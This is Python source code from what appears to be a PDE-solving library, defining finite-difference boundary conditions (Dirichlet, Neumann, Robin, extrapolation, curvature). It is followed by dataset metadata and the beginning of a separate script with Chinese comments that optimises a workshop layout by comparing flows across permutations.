arr (:class:`numpy.ndarray`): The full data array\n idx (tuple): An index into the data array\n axis (int): The axis along which the 1d array will be extracted\n \n Returns:\n tuple: a tuple (arr_1d, i, bc_i), where `arr_1d` is the 1d array, `i` is\n the index `i` into this array marking the current point and `bc_i` are\n the remaining components of `idx`, which locate the point in the\n orthogonal directions. Consequently, `i = idx[axis]` and\n `arr[..., idx] == arr_1d[..., i]`.\n \"\"\"\n dim = len(idx)\n # extract the correct indices\n if dim == 1:\n i = idx[0]\n bc_idx: Tuple[int, ...] = tuple()\n arr_1d = arr\n \n elif dim == 2:\n if axis == 0:\n i, y = idx\n bc_idx = (y,)\n arr_1d = arr[..., :, y]\n elif axis == 1:\n x, i = idx\n bc_idx = (x,)\n arr_1d = arr[..., x, :]\n \n elif dim == 3:\n if axis == 0:\n i, y, z = idx\n bc_idx = (y, z)\n arr_1d = arr[..., :, y, z]\n elif axis == 1:\n x, i, z = idx\n bc_idx = (x, z)\n arr_1d = arr[..., x, :, z]\n elif axis == 2:\n x, y, i = idx\n bc_idx = (x, y)\n arr_1d = arr[..., x, y, :]\n \n else:\n raise NotImplementedError \n \n return arr_1d, i, bc_idx\n\n\n\ndef _make_get_arr_1d(dim: int, axis: int) -> Callable:\n \"\"\" create function that extracts a 1d array at a given position\n \n Args:\n dim (int): The dimension of the space, i.e., the number of axes in the\n supplied data array\n axis (int): The axis that is returned as the 1d array\n \n Returns:\n function: A numba compiled function that takes the full array `arr` and\n an index `idx` (a tuple of `dim` integers) specifying the point where\n the 1d array is extract. The function returns a tuple (arr_1d, i, bc_i),\n where `arr_1d` is the 1d array, `i` is the index `i` into this array\n marking the current point and `bc_i` are the remaining components of\n `idx`, which locate the point in the orthogonal directions.\n Consequently, `i = idx[axis]` and `arr[..., idx] == arr_1d[..., i]`.\n \"\"\"\n assert 0 <= axis < dim\n \n @jit\n def get_arr_1d(arr, idx: Tuple[int, ...]) \\\n -> Tuple[Any, int, Tuple[int, ...]]:\n \"\"\" extract the 1d array along axis at point idx \"\"\"\n # extract the correct indices\n if dim == 1:\n i = idx[0]\n bc_idx: Tuple[int, ...] = tuple()\n arr_1d = arr\n \n elif dim == 2:\n if axis == 0:\n i, y = idx\n bc_idx = (y,)\n arr_1d = arr[..., :, y]\n elif axis == 1:\n x, i = idx\n bc_idx = (x,)\n arr_1d = arr[..., x, :]\n \n elif dim == 3:\n if axis == 0:\n i, y, z = idx\n bc_idx = (y, z)\n arr_1d = arr[..., :, y, z]\n elif axis == 1:\n x, i, z = idx\n bc_idx = (x, z)\n arr_1d = arr[..., x, :, z]\n elif axis == 2:\n x, y, i = idx\n bc_idx = (x, y)\n arr_1d = arr[..., x, y, :]\n \n else:\n raise NotImplementedError \n \n return arr_1d, i, bc_idx\n \n return get_arr_1d # type: ignore\n\n\n\nclass BCBase(metaclass=ABCMeta):\n \"\"\" represents a single boundary in an BoundaryPair instance \"\"\"\n \n names: List[str] # identifiers for the given boundary\n homogeneous: bool # spatial dependence of boundary condition?\n value: Any # the actual value of the boundary condition\n\n _subclasses: Dict[str, Any] = {} # all classes inheriting from this\n _conditions: Dict[str, Any] = {}\n \n \n def __init__(self, grid: GridBase, axis: int, upper: bool, value=0):\n \"\"\" \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Flag indicating whether this boundary condition is associated\n with the upper side of an axis or not. In essence, this\n determines the direction of the local normal vector of the\n boundary.\n value (float or str or array):\n a value stored with the boundary condition. The interpretation\n of this value depends on the type of boundary condition. If\n value is a single value (or tensor in case of tensorial boundary\n conditions), the same value is applied to all points.\n Inhomogeneous boundary conditions are possible by supplying an\n expression as a string, which then may depend on the axes names\n of the respective grid.\n \"\"\"\n self.grid = grid\n self.axis = axis\n self.upper = upper\n self.set_value(value)\n \n \n def set_value(self, value=0):\n \"\"\" set the value of this boundary condition\n \n Args:\n value (float or str or array):\n a value stored with the boundary condition. The interpretation\n of this value depends on the type of boundary condition.\n \"\"\"\n self._value_expression = value\n \n if isinstance(value, str):\n # inhomogeneous value given by an expression \n self.homogeneous = False\n\n # determine which coordinates are allowed to vary \n axes_ids = (list(range(self.axis)) +\n list(range(self.axis + 1, self.grid.num_axes)))\n \n # parse the expression with the correct variables\n bc_vars = [self.grid.axes[i] for i in axes_ids]\n expr = ScalarExpression(value, bc_vars)\n \n # determine the value at each boundary position\n bc_coords = np.meshgrid(*[self.grid.axes_coords[i]\n for i in axes_ids],\n indexing='ij')\n self.value = expr(**{name: value\n for name, value in zip(bc_vars, bc_coords)})\n \n elif np.isscalar(value):\n # homogeneous, scalar value\n self.homogeneous = True\n self.value = float(value)\n \n else:\n # assume a homogeneous, tensorial value \n self.homogeneous = True\n self.value = np.array(value, dtype=np.double)\n # check whether the value is actually a scalar. This is necessary\n # since np.isscalar(np.array(0)) == False\n if self.value.ndim == 0:\n self.value = float(self.value)\n \n\n def __init_subclass__(cls, **kwargs): # @NoSelf\n \"\"\" register all subclassess to reconstruct them later \"\"\"\n super().__init_subclass__(**kwargs)\n cls._subclasses[cls.__name__] = cls\n if hasattr(cls, 'names'):\n for name in cls.names:\n cls._conditions[name] = cls\n\n\n @classmethod\n def get_help(cls) -> str:\n \"\"\" Return information on how boundary conditions can be set \"\"\"\n types = ', '.join(f\"'{subclass.names[0]}'\"\n for subclass in cls._subclasses.values()\n if hasattr(subclass, 'names'))\n return (f\"Possible types of boundary conditions are {types}. \"\n \"Values can be set using {'type': TYPE, 'value': VALUE}.\"\n \"Here, VALUE can be a scalar number, a vector for tensorial \"\n \"boundary conditions, or a string, which can be interpreted \"\n \"as a sympy expression. In the latter case, the names of the \"\n \"axes not associated with this boundary can be used as \"\n \"variables to describe inhomogeneous boundary conditions.\")\n\n \n def __repr__(self):\n if np.array_equal(self.value, 0):\n return (f\"{self.__class__.__name__}(\"\n f\"axis={self.axis}, upper={self.upper}, \"\n f\"homogeneous={self.homogeneous})\")\n else:\n return (f\"{self.__class__.__name__}(\"\n f\"axis={self.axis}, upper={self.upper}, \"\n f\"homogeneous={self.homogeneous}, value={self.value!r})\")\n \n \n def __str__(self):\n if hasattr(self, 'names'):\n if np.array_equal(self.value, 0):\n return f'\"{self.names[0]}\"' \n elif self.homogeneous:\n return (f'{{\"type\": \"{self.names[0]}\", '\n f'\"value\": {self.value}}}')\n else:\n return (f'{{\"type\": \"{self.names[0]}\", '\n f'\"value\": \"{self._value_expression}\"}}')\n else:\n raise RuntimeError('This class should not be used directly')\n \n \n def __eq__(self, other):\n \"\"\" checks for equality neglecting the `upper` property \"\"\"\n return (self.__class__ == other.__class__ and\n self.grid == other.grid and \n self.axis == other.axis and\n self.homogeneous == other.homogeneous and\n np.all(self.value == other.value))\n \n\n def __neq__(self, other):\n return not self.__eq__(other)\n\n\n def copy(self, upper: Optional[bool] = None, value=None) -> \"BCBase\":\n \"\"\" return a copy of itself, but with a reference to the same grid \"\"\"\n if upper is None:\n upper = self.upper\n if value is None:\n value = self._value_expression\n return self.__class__(grid=self.grid, axis=self.axis, upper=upper,\n value=value)\n \n \n @property\n def rank(self) -> int:\n \"\"\" return the rank of the boundary condition \"\"\"\n if self.homogeneous:\n if np.isscalar(self.value):\n return 0\n else:\n return self.value.ndim # type: ignore\n else:\n return 0 # only scalar values by definition\n \n \n @property\n def is_scalar(self) -> bool:\n \"\"\" bool: whether the boundary condition is a scalar \"\"\"\n return self.rank == 0\n \n\n def extract_component(self, *indices):\n \"\"\" extracts the boundary conditions for the given component\n\n Args:\n *indices:\n One or two indices for vector or tensor fields, respectively\n \"\"\"\n if not self.homogeneous:\n raise NotImplementedError('Only homogeneous boundary conditions '\n 'support tensorial values')\n \n if np.array_equal(self.value, 0): # special case for all ranks\n value = 0\n \n elif len(indices) == 0: # scalar conditions\n value = self.value\n \n else: # tensorial boundary conditions\n value = self.value[indices]\n \n return self.copy(value=value)\n\n \n @classmethod\n def from_str(cls, grid: GridBase, axis: int, upper: bool, condition: str,\n value=0, **kwargs) -> \"BCBase\":\n r\"\"\" creates boundary from a given string identifier\n \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n condition (str):\n Identifies the boundary condition\n value (float or str or array):\n Sets the associated value\n \\**kwargs:\n Additional arguments passed to the constructor\n \"\"\"\n if condition == 'no-flux' and np.all(value == 0):\n condition = 'derivative'\n\n # extract the class\n try:\n boundary_class = cls._conditions[condition]\n except KeyError:\n raise ValueError(f'Boundary condition `{condition}` not defined. '\n f'{cls.get_help()}')\n\n # create the actual class \n return boundary_class(grid=grid, axis=axis, upper=upper, # type: ignore\n value=value, **kwargs)\n \n \n @classmethod\n def from_dict(cls, grid: GridBase, axis: int, upper: bool,\n data: Dict[str, Any]) -> \"BCBase\":\n \"\"\" create boundary from data given in dictionary\n \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n data (dict):\n The dictionary defining the boundary condition\n \"\"\"\n data = data.copy() # need to make a copy since we modify it below\n \n # parse all possible variants that could be given\n if data.keys() == {'value'}:\n # only a value is given => Assume Dirichlet conditions\n b_type = 'value'\n b_value = data.pop('value')\n \n elif data.keys() == {'derivative'}:\n # the derivative is obviously given => Assume Neumann conditions\n b_type = 'derivative'\n b_value = data.pop('derivative')\n \n elif data.keys() == {'mixed'}:\n # short notation for mixed condition\n b_type = 'mixed'\n b_value = data.pop('mixed')\n \n elif data.keys() == {'curvature'}:\n # short notation for curvature condition\n b_type = 'curvature'\n b_value = data.pop('curvature')\n \n elif 'type' in data.keys():\n # type is given (optionally with a value)\n b_type = data.pop('type')\n b_value = data.pop('value', 0)\n \n else:\n raise ValueError('Boundary condition defined by '\n f'{str(list(data.keys()))} are not supported.')\n \n # initialize the boundary class with all remaining values forwarded\n return cls.from_str(grid, axis, upper, condition=b_type, value=b_value,\n **data)\n \n \n @classmethod\n def from_data(cls, grid: GridBase, axis: int, upper: bool,\n data: BoundaryData) -> \"BCBase\":\n \"\"\" create boundary from some data\n\n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n data (str or dict):\n Data that describes the boundary\n \n Returns:\n :class:`~pde.grids.boundaries.local.BCBase`: the instance created\n from the data\n \n Throws:\n ValueError if `data` cannot be interpreted as a boundary condition\n \"\"\"\n # check all different data formats\n if isinstance(data, BCBase):\n # already in the correct format\n assert data.grid == grid and data.axis == axis\n return data.copy(upper=upper)\n \n elif isinstance(data, dict):\n # create from dictionary\n return cls.from_dict(grid, axis, upper=upper, data=data)\n \n elif isinstance(data, str):\n # create a specific condition given by a string\n return cls.from_str(grid, axis, upper=upper, condition=data)\n \n else:\n raise ValueError(f'Unsupported boundary format: `{data}`. '\n f'{cls.get_help()}')\n\n\n def check_value_rank(self, rank: int):\n \"\"\" check whether the values at the boundaries have the correct rank\n \n Args:\n rank (tuple): The rank of the value that is stored with this\n boundary condition\n \n Throws:\n RuntimeError: if the value does not have rank `rank`\n \"\"\"\n if self.homogeneous:\n if np.isscalar(self.value) and self.value == 0:\n return True\n \n elif rank == 0:\n if self.rank != 0:\n raise RuntimeError('Expected scalar boundary condition but '\n f'got `{self.value}`')\n \n elif np.isscalar(self.value): # self.value != 0\n raise RuntimeError('Expected boundary condition of rank '\n f'{rank} but got scalar `{self.value}`')\n \n elif self.value.shape != (self.grid.dim,) * rank:\n raise RuntimeError('Expected boundary condition of rank '\n f'{rank} but got shape `{self.value.shape}`')\n \n else:\n # inhomogeneous boundary conditions\n if rank != 0:\n raise NotImplementedError('Only homogeneous tensorial boundary '\n 'conditions are supported')\n \n return True\n \n \n @abstractmethod\n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float: pass\n \n @abstractmethod\n def get_virtual_point_evaluator(self) -> Callable: pass\n \n @abstractmethod\n def get_adjacent_evaluator(self) -> Callable: pass\n \n @property\n def differentiated(self) -> \"BCBase\": \n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n raise NotImplementedError\n\n\n\nclass BCBase1stOrder(BCBase):\n \"\"\" represents a single boundary in an BoundaryPair instance \"\"\"\n\n\n @abstractmethod\n def get_virtual_point_data(self) -> Tuple[Any, Any, int]: pass\n\n\n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float:\n \"\"\" calculate the value of the virtual point outside the boundary \n \n Args:\n arr (array): The data values associated with the grid\n idx (tuple): The index of the point to evaluate. This is a tuple of\n length `grid.num_axes` with the either -1 or `dim` as the entry\n for the axis associated with this boundary condition. Here,\n `dim` is the dimension of the axis. The index is optional if\n dim == 1. \n \n Returns:\n float: Value at the virtual support point\n \"\"\"\n if idx is None:\n if self.grid.num_axes == 1:\n idx = (self.grid.shape[0] if self.upper else -1,)\n else:\n raise ValueError('Index `idx` can only be deduced for grids '\n 'with a single axis.')\n \n # extract the 1d array\n arr_1d, _, bc_idx = _get_arr_1d(arr, idx, axis=self.axis)\n \n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n else:\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]])\n\n\n def get_virtual_point_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value at the virtual support point\n\n Returns:\n function: A function that takes the data array and an index marking\n the current point, which is assumed to be a virtual point. The\n result is the data value at this point, which is calculated using\n the boundary condition.\n \"\"\"\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, _ = get_arr_1d(arr, idx)\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n \n else:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, bc_idx = get_arr_1d(arr, idx)\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]])\n \n return virtual_point # type: ignore\n \n \n def get_adjacent_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value adjacent to a given point \n\n Returns:\n function: A function that takes the data array and an index marking\n the current point. The result is the data value at the adjacent \n point along the axis associated with this boundary condition in the\n upper (lower) direction when `upper` is True (False).\n \"\"\"\n size = self.grid.shape[self.axis]\n upper = self.upper\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data_vp = self.get_virtual_point_data()\n \n if self.homogeneous:\n # the boundary condition does not depend on space\n if self.is_scalar:\n zero = 0.\n else:\n zero = np.zeros((self.grid.dim,) * self.rank)\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n # extract the 1d array\n arr_1d, i, _ = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point. Note\n # that this is an optimization that apparently accelerates the\n # computation. The alternative direct calculation (that is also\n # used in the inhomogeneous case below) turned out to be\n # significantly slower.\n if upper:\n if i == size - 1:\n data = data_vp\n else:\n data = (zero, 1., i + 1)\n else:\n if i == 0:\n data = data_vp\n else:\n data = (zero, 1., i - 1)\n \n # calculate the values\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n \n else:\n # the boundary condition is a function of space\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n arr_1d, i, bc_idx = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]])\n else:\n val = arr_1d[..., i + 1]\n else:\n if i == 0:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]])\n else:\n val = arr_1d[..., i - 1]\n \n return val # type: ignore\n \n return adjacent_point # type: ignore \n \n\n\nclass DirichletBC(BCBase1stOrder):\n \"\"\" represents a boundary condition imposing the value \"\"\"\n \n names = ['value', 'dirichlet'] # identifiers for this boundary condition\n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n \n value = 2 * self.value\n factor = -1 if np.isscalar(value) else -np.ones_like(self.value)\n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n \n \n @property\n def differentiated(self) -> BCBase:\n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n return NeumannBC(grid=self.grid, axis=self.axis, upper=self.upper,\n value=np.zeros_like(self.value))\n\n\n\nclass NeumannBC(BCBase1stOrder):\n \"\"\" represents a boundary condition imposing the derivative in the outward\n normal direction of the boundary \"\"\"\n \n names = ['derivative', 'neumann'] # identifiers for this boundary condition \n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n value = dx * self.value\n factor = 1 if np.isscalar(value) else np.ones_like(self.value)\n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n\n\n @property\n def differentiated(self) -> BCBase:\n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n return CurvatureBC(grid=self.grid, axis=self.axis, upper=self.upper,\n value=np.zeros_like(self.value))\n\n\n\nclass MixedBC(BCBase1stOrder):\n r\"\"\" represents a mixed (or Robin) boundary condition imposing a derivative\n in the outward normal direction of the boundary that is given by an affine\n function involving the actual value:\n \n .. math::\n \\partial_n c + \\gamma c = \\beta\n \n Here, :math:`c` is the field to which the condition is applied, \n :math:`\\gamma` quantifies the influence of the field and :math:`\\beta` is \n the constant term. Note that :math:`\\gamma = 0` corresponds\n to Dirichlet conditions imposing :math:`\\beta` as the derivative.\n Conversely, :math:`\\gamma \\rightarrow \\infty` corresponds to imposing a\n zero value on :math:`c`. \n \"\"\"\n \n names = ['mixed', 'robin']\n \n def __init__(self, grid: GridBase, axis: int, upper: bool, value=0,\n const: float = 0):\n r\"\"\" \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Flag indicating whether this boundary condition is associated\n with the upper side of an axis or not. In essence, this\n determines the direction of the local normal vector of the\n boundary.\n value (float or str or array):\n The parameter :math:`\\gamma` quantifying the influence of the\n field onto its normal derivative. If `value` is a single value\n (or tensor in case of tensorial boundary conditions), the same\n value is applied to all points. Inhomogeneous boundary\n conditions are possible by supplying an expression as a string,\n which then may depend on the axes names of the respective grid.\n const (float):\n The parameter :math:`\\beta` determining the constant term for \n the boundary condition. This term does not yet allow for\n tensorial or spatially varying values.\n \"\"\"\n super().__init__(grid, axis, upper, value)\n # TODO: support spatially varying constant terms β\n self.const = float(const) \n \n def __eq__(self, other):\n \"\"\" checks for equality neglecting the `upper` property \"\"\"\n return super().__eq__(other) and self.const == other.const\n\n\n def copy(self, upper: Optional[bool] = None, value=None, const=None) \\\n -> \"MixedBC\":\n \"\"\" return a copy of itself, but with a reference to the same grid \"\"\"\n if upper is None:\n upper = self.upper\n if value is None:\n value = self._value_expression\n if const is None:\n const = self.const\n return self.__class__(grid=self.grid, axis=self.axis, upper=upper,\n value=value, const=const) \n \n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n factor = dx * self.value\n if np.isscalar(factor):\n if np.isinf(factor):\n value = 0\n factor = -1\n else:\n value = 2 * dx * self.const / (2 + factor)\n factor = (2 - factor) / (2 + factor)\n else:\n # calculate values assuming finite factor\n value = 2 * dx * self.const / (2 + factor)\n factor = (2 - factor) / (2 + factor)\n # correct at places of infinite values \n value[np.isinf(factor)] = 0 # type: ignore\n factor[np.isinf(factor)] = -1\n \n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n \n\n\nclass BCBase2ndOrder(BCBase):\n \"\"\" abstract base class for boundary conditions of 2nd order \"\"\"\n \n \n @abstractmethod\n def get_virtual_point_data(self) -> Tuple[Any, Any, int, Any, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data associated with this virtual point \n \"\"\" \n\n \n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float:\n \"\"\" calculate the value of the virtual point outside the boundary \n \n Args:\n arr (array): The data values associated with the grid\n idx (tuple): The index of the point to evaluate. This is a tuple of\n length `grid.num_axes` with the either -1 or `dim` as the entry\n for the axis associated with this boundary condition. Here,\n `dim` is the dimension of the axis. The index is optional if\n dim == 1. \n \n Returns:\n float: Value at the virtual support point\n \"\"\"\n if idx is None:\n if self.grid.num_axes == 1:\n idx = (self.grid.shape[0] if self.upper else -1,)\n else:\n raise ValueError('Index `idx` can only be deduced for grids '\n 'with a single axis.')\n\n # extract the 1d array\n arr_1d, _, bc_idx = _get_arr_1d(arr, idx, axis=self.axis)\n \n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]] + \n data[3] * arr_1d[..., data[4]])\n else:\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]] +\n data[3][bc_idx] * arr_1d[..., data[4]])\n \n \n def get_virtual_point_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value at the virtual support point\n\n Returns:\n function: A function that takes the data array and an index marking\n the current point, which is assumed to be a virtual point. The\n result is the data value at this point, which is calculated using\n the boundary condition.\n \"\"\"\n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if size < 2:\n raise ValueError('Need at least two support points along axis '\n f'{self.axis} to apply boundary conditions')\n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, _ = get_arr_1d(arr, idx)\n \n return (data[0] +\n data[1] * arr_1d[..., data[2]] +\n data[3] * arr_1d[..., data[4]])\n \n else:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, bc_idx = get_arr_1d(arr, idx)\n \n return (data[0][bc_idx] +\n data[1][bc_idx] * arr_1d[..., data[2]] +\n data[3][bc_idx] * arr_1d[..., data[4]])\n \n return virtual_point # type: ignore\n \n\n def get_adjacent_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value adjacent to a given point \n\n Returns:\n function: A function that takes the data array and an index marking\n the current point. The result is the data value at the adjacent \n point along the axis associated with this boundary condition in the\n upper (lower) direction when `upper` is True (False).\n \"\"\"\n size = self.grid.shape[self.axis]\n upper = self.upper\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if size < 2:\n raise ValueError('Need at least two support points along axis '\n f'{self.axis} to apply boundary conditions')\n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data_vp = self.get_virtual_point_data()\n \n if self.homogeneous:\n # the boundary condition does not depend on space\n if self.is_scalar:\n zero = 0.\n else:\n zero = np.zeros((self.grid.dim,) * self.rank)\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n # extract the 1d array\n arr_1d, i, _ = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n data = data_vp\n else:\n data = (zero, 1., i + 1, 0., 0)\n else:\n if i == 0:\n data = data_vp\n else:\n data = (zero, 1., i - 1, 0., 0)\n \n # calculate the values\n return (data[0] +\n data[1] * arr_1d[..., data[2]] +\n data[3] * arr_1d[..., data[4]])\n \n else:\n # the boundary condition is a function of space\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n arr_1d, i, bc_idx = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]] + \n data_vp[3][bc_idx] * arr_1d[..., data_vp[4]])\n else:\n val = arr_1d[..., i + 1]\n else:\n if i == 0:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]] +\n data_vp[3][bc_idx] * arr_1d[..., data_vp[4]])\n else:\n val = arr_1d[..., i - 1]\n \n return val\n \n return adjacent_point # type: ignore \n\n\n\nclass ExtrapolateBC(BCBase2ndOrder):\n \"\"\" represents a boundary condition that extrapolates the virtual point\n using two points close to the boundary\n \n This imposes a vanishing second derivative.\n \"\"\"\n \n names = ['extrapolate', 'extrapolation'] # identifiers for this condition \n\n \n def get_virtual_point_data(self) -> Tuple[float, float, int, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n \n if size < 2:\n raise RuntimeError('Need at least 2 support points to use the '\n 'extrapolate boundary condition.')\n\n if self.upper:\n i1 = size - 1\n i2 = size - 2\n else:\n i1 = 0\n i2 = 1\n return (0., 2., i1, -1., i2)\n\n\n\nclass CurvatureBC(BCBase2ndOrder):\n \"\"\" represents a boundary condition imposing the 2nd derivative at the\n boundary \"\"\"\n \n names = ['curvature', 'second_derivative'] # identifiers for this BC \n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n if size < 2:\n raise RuntimeError('Need at least 2 support points to use the '\n 'curvature boundary condition.')\n\n value = self.value * dx**2\n ones = 1 if np.isscalar(value) else np.ones_like(value)\n if self.upper:\n f1, i1 = 2., size - 1\n f2, i2 = -1., size - 2\n else:\n f1, i1 = 2., 0\n f2, i2 = -1., 1\n return (value, f1 * ones, i1, f2 * ones, i2)\n","sub_path":"pde/grids/boundaries/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":42400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"404319171","text":"#计算从至表\nimport numpy as np\nimport pandas as pd\n\n#————————————————————————————修改的内容————————————————————————————————#\n\n#原材料库A 铸造车间B 热处理车间C 机加工车间D 精密车间E 标准件半成品库F\n#仓库组成的序列\nobj=pd.Series(['A','B','C','D','E','F'],index=[1,2,3,4,5,6])\n#print(obj)\n#零件组成的字典。零件名:权重,[加工顺序]\nparts={'s1':[9,['A','D','C','F']], \n 's2':[90,['A','B','D','E','F']],\n 's3':[3,['A','B','D','F']],\n 's4':[3,['A','D','E','F']],\n 's5':[27,['A','D','E','F']],\n 's6':[700,['A','B','D','E','F']],\n 's7':[60,['A','D','C','E','F']],\n 's8':[56,['A','D','E','F']],\n 's9':[32,['A','D','F']],\n 's10':[1,['A','D','C','E','F']],\n 's11':[120,['A','C','D','C','E','F']],\n 's12':[60,['A','C','D','C','E','F']],\n 's13':[80,['A','D','C','F']]\n }\n\n#—————————————————————————场地数组的全排列——————————————————————————————#\n\nm=len(obj) #加工场地的个数\nobj_sort=[i for i in range(1, m+1)] #需要排列的列表\n\ndef AllRange(listx,p,q): #递归生成全排列列表sorts \n if p == q:\n all_sorts.append(list(listx)) \n else:\n for i in range(p,q):\n listx[i],listx[p]=listx[p],listx[i]\n AllRange(listx,p+1,q)\n listx[i],listx[p]=listx[p],listx[i]\n \nall_sorts=[] #所有全排列可能的列表\nAllRange(obj_sort,0,len(obj_sort))\n\n#—————————————————————————计算流量最小时的排列——————————————————————————#\n\nmin_flow=100000000 #最小流量,根据情况设置一个比较大的值\nbest_sort=[] #最小流量下的排序\n\n#计算一个零件在某排序下的流量\ndef one_part_folw(info,now_range): \n p_flow=0 #不加权重的流量\n n=len(info[1])\n for i in range(n-1): #工序A对应的数字1,在新排序中的先后位置\n index_f=obj[obj.values==info[1][i]].index #工序对应的标签\n index_l=obj[obj.values==info[1][i+1]].index\n f=now_range.index(index_f) \n l=now_range.index(index_l)\n if f > l:\n p_flow += (f-l)*2\n else:\n p_flow += 